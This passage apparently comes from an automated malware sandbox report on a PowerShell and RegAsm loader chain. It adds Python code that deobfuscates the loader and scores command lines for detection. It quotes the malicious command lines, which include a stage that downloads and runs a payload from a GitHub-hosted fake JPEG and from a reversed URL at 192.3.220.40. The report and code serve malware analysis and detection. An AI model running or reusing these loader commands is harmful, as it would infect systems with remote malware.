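    """Evaluate an expression made only of string literals and [char]N casts
    joined with '+', the operand types these obfuscators use."""
    parts = []
    for lit, code in _TOKEN.findall(expr):
        if code:
            parts.append(chr(int(code, 16) if code.lower().startswith("0x") else int(code)))
        else:
            parts.append(lit.replace("''", "'"))
    return "".join(parts)


def unreverse_strings(text):
    """Restore any quoted literal that is a URL written backwards."""
    def fix(m):
        rev = m.group(1)[::-1]
        return "'%s'" % rev if re.match(r"https?://", rev, re.I) else m.group(0)
    return re.sub(r"'([^']*)'", fix, text)


def deobfuscate_layer1(cmd):
    """('frag'+'ment').Replace(a, b).Replace(c, d) -> the script that reaches iex."""
    m = re.search(r"\)\s*\.replace\(", cmd, re.I)
    if not m:
        raise ValueError("expected a ('...'+'...').Replace(...) chain")
    text = ps_concat(cmd[:m.start()])
    for old, new in _REPLACE.findall(cmd[m.start():]):
        text = text.replace(ps_concat(old), ps_concat(new))  # String.Replace is ordinal
    return unreverse_strings(text)


def resolve_gv_index(pattern, indexes, variables=PREFERENCE_VARIABLES):
    """(gV '<pattern>').Name[i,j,k] -join '' without a PowerShell host."""
    rx = re.compile("^" + re.escape(pattern).replace(r"\*", ".*") + "$", re.I)
    names = [v for v in variables if rx.match(v)]
    if len(names) != 1:
        raise ValueError("pattern %r matched %r" % (pattern, names))
    return "".join(names[0][i] for i in indexes)


def resolve_pipe_target(cmd):
    """Name of the command the '| . (...)' pipe invokes, when built this way."""
    m = _GV_INDEX.search(cmd)
    if not m:
        return None
    return resolve_gv_index(m.group(1), [int(i) for i in m.group(2).split(",")])


def deobfuscate_layer2(cmd):
    """IEx($(IeX('...'+[char]N+...))) -> the base64-decoded script."""
    inner = ps_concat(cmd)  # the text the inner IeX receives
    m = re.search(r'frombase64string\(\s*"([A-Za-z0-9+/=]+)"\s*\)', inner, re.I)
    if not m:
        raise ValueError('no FromBase64String("...") literal in the rebuilt text')
    return base64.b64decode(m.group(1)).decode("utf-8")


if __name__ == "__main__":
    print("layer 1 is piped into:", resolve_pipe_target(LAYER1))
    print(deobfuscate_layer1(LAYER1))
    print("layer 2 decodes to:", deobfuscate_layer2(LAYER2))
```

Run stand-alone it prints the reconstructed stage-3 script, and the operational facts fall out without touching the network: the raw.githubusercontent.com URL that hosts the next stage inside a file named as a JPEG, the <<BASE64_START>>/<<BASE64_END>> markers it cuts on, Assembly.Load of the embedded assembly whose dnlib type names also appear in the powershell.exe memory strings above, and the arguments handed to [dnlib.IO.Home]::VAI, among them http://192.3.220.40/450/RRFCCE.txt and 'RegAsm', which matches the RegAsm.exe processes in this report.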
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041CBE1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_04235662 push eax; iretd 3_2_04235699
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_04D222D5 pushad ; iretd 7_2_04D2237A
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_04D2239B pushad ; iretd 7_2_04D2237A
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_04D2233B pushad ; iretd 7_2_04D2237A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_00457186 push ecx; ret 11_2_00457199
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0045E55D push esi; ret 11_2_0045E566
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_00457AA8 push eax; ret 11_2_00457AC6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_00434EB6 push ecx; ret 11_2_00434EC9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_10002806 push ecx; ret 11_2_10002819
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0044693D push ecx; ret 12_2_0044694D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0044DB70 push eax; ret 12_2_0044DB84
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0044DB70 push eax; ret 12_2_0044DBAC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00451D54 push eax; ret 12_2_00451D61
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0044B090 push eax; ret 14_2_0044B0A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0044B090 push eax; ret 14_2_0044B0CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00451D34 push eax; ret 14_2_00451D41
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00444E71 push ecx; ret 14_2_00444E81
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00414060 push eax; ret 15_2_00414074
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00414060 push eax; ret 15_2_0041409C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00414039 push ecx; ret 15_2_00414049
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_004164EB push 0000006Ah; retf 15_2_004165C4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00416553 push 0000006Ah; retf 15_2_004165C4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00416555 push 0000006Ah; retf 15_2_004165C4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_00406EEB ShellExecuteW,URLDownloadToFileW, 11_2_00406EEB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 11_2_0041AADB
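Detection logic over these command lines, as an added example that is not part of the report: a scoring function in the spirit of the Sigma rules this sample tripped (base64 encoding, case anomaly, reversed commands, command-line obfuscation), run over abridged copies of the three command lines in this section plus one constructed benign line. The indicators are the ones visible in those lines; the weights and the 8/3 thresholds are assumptions chosen for this example, not Sigma's.

```python
"""Heuristic scoring of PowerShell command lines (added example, not report code)."""
import re

# Abridged copies of the three process-creation lines in this section (base64
# blobs and most of the stage-3 script cut) plus one constructed benign line.
SAMPLES = {
    "mshta_child": r'''"C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAg'+[ChAr]0X22+'))')))"''',
    "wscript_child": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JEcgICAg';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD''',
    "powershell_child": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLRegAsmNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"''',
    "benign": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File C:\Scripts\Get-Inventory.ps1''',
}

# keyword -> documented spelling; all-lower, all-upper and Capitalised also pass.
CANONICAL = {
    "powershell.exe": "powershell.exe", "executionpolicy": "ExecutionPolicy",
    "bypass": "Bypass", "windowstyle": "WindowStyle", "hidden": "Hidden",
    "noprofile": "NoProfile", "command": "Command",
    "frombase64string": "FromBase64String", "getstring": "GetString",
    "replace": "Replace", "char": "char", "string": "string", "iex": "iex",
}

# (label, weight, pattern, minimum number of matches)
RULES = [
    ("execution policy bypass", 2, r"-(?:ex|ep|executionpolicy)\s+bypass", 1),
    ("hidden window", 1, r"-w(?:indowstyle)?\s+(?:1|hidden)\b", 1),
    ("base64 decode", 2, r"frombase64string", 1),
    ("invoke-expression", 2, r"\biex\b|invoke-expression", 1),
    ("[char] code concatenation", 3, r"\[char\]\s*(?:0x[0-9a-f]+|\d+)", 2),
    ("string split with '+'", 2, r"'\+'", 3),
    (".Replace() rewriting", 2, r"\.replace\(", 2),
    ("reversed URL scheme", 3, r"//:s?ptth", 1),
    ("in-memory assembly load", 3, r"\[system\.reflection\.assembly\]::load\(", 1),
    ("cmdlet name built from a variable lookup", 3, r"\b(?:gv|get-variable)\s+'\*[^']*\*'", 1),
]
CASE_WEIGHT, CASE_MIN = 3, 2


def case_anomalies(cmd):
    """Keywords spelled like pOwerSHelL or byPaSs: neither a normal casing nor
    the documented one. Several of these is the 'case anomaly' signal."""
    hits = []
    for kw, canonical in CANONICAL.items():
        for m in re.finditer(re.escape(kw), cmd, re.I):
            s = m.group(0)
            if s not in (s.lower(), s.upper(), s.capitalize(), canonical):
                hits.append(s)
    return hits


def score(cmd):
    """Return (total, reasons) for one command line; reasons name each indicator."""
    total, reasons = 0, []
    for label, weight, pattern, min_count in RULES:
        n = len(re.findall(pattern, cmd, re.I))
        if n >= min_count:
            total += weight
            reasons.append("%s (x%d)" % (label, n))
    anomalies = case_anomalies(cmd)
    if len(anomalies) >= CASE_MIN:
        total += CASE_WEIGHT
        reasons.append("case anomaly (%s)" % ", ".join(anomalies[:3]))
    return total, reasons


def verdict(cmd, obfuscated_at=8, suspicious_at=3):
    """Assumed thresholds: 8+ obfuscated, 3+ suspicious, otherwise benign."""
    total = score(cmd)[0]
    if total >= obfuscated_at:
        return "obfuscated"
    return "suspicious" if total >= suspicious_at else "benign"


if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        total, reasons = score(cmd)
        print("%-17s %-10s %2d  %s" % (name, verdict(cmd), total, "; ".join(reasons)))
```

Note what the split-string layer does to naive matching: the stage-3 line never contains the literal FromBase64String (it is 'F'+'romBase64String'), so that rule misses it, and the line is caught instead by the fragment joins, the .Replace() chain, the reversed scheme, Assembly.Load and the gV lookup. The wscript-spawned line carries only the base64 decode, a hidden window and the policy bypass, which is why it lands at "suspicious" rather than "obfuscated" under these assumed thresholds.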

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 occurrences)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 occurrences)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041CBE1
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040F7E2 Sleep,ExitProcess,11_2_0040F7E2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,11_2_0041A7D9
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5085
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4694
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7953
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1640
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 401
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 429
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3423
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6311
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9362
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_11-53560
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 9.6 %
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6672Thread sleep time: -17524406870024063s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6300Thread sleep count: 7953 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6156Thread sleep count: 1640 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3176Thread sleep time: -7378697629483816s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6204Thread sleep count: 401 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4320Thread sleep count: 146 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6536Thread sleep count: 429 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6428Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6584Thread sleep count: 3423 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6728Thread sleep count: 6311 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3176Thread sleep time: -15679732462653109s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2680Thread sleep count: 256 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2680Thread sleep time: -128000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2180Thread sleep count: 125 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2180Thread sleep time: -375000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2180Thread sleep count: 9362 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2180Thread sleep time: -28086000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_0040928E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,11_2_0041C322
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,11_2_0040C388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_004096A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,11_2_00408847
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_00407877 FindFirstFileW,FindNextFileW,11_2_00407877
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0044E8F9 FindFirstFileExA,11_2_0044E8F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,11_2_0040BB6B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,11_2_00419B86
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,11_2_0040BD72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_100010F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_10006580 FindFirstFileExA,11_2_10006580
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0040AE51 FindFirstFileW,FindNextFileW,12_2_0040AE51
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
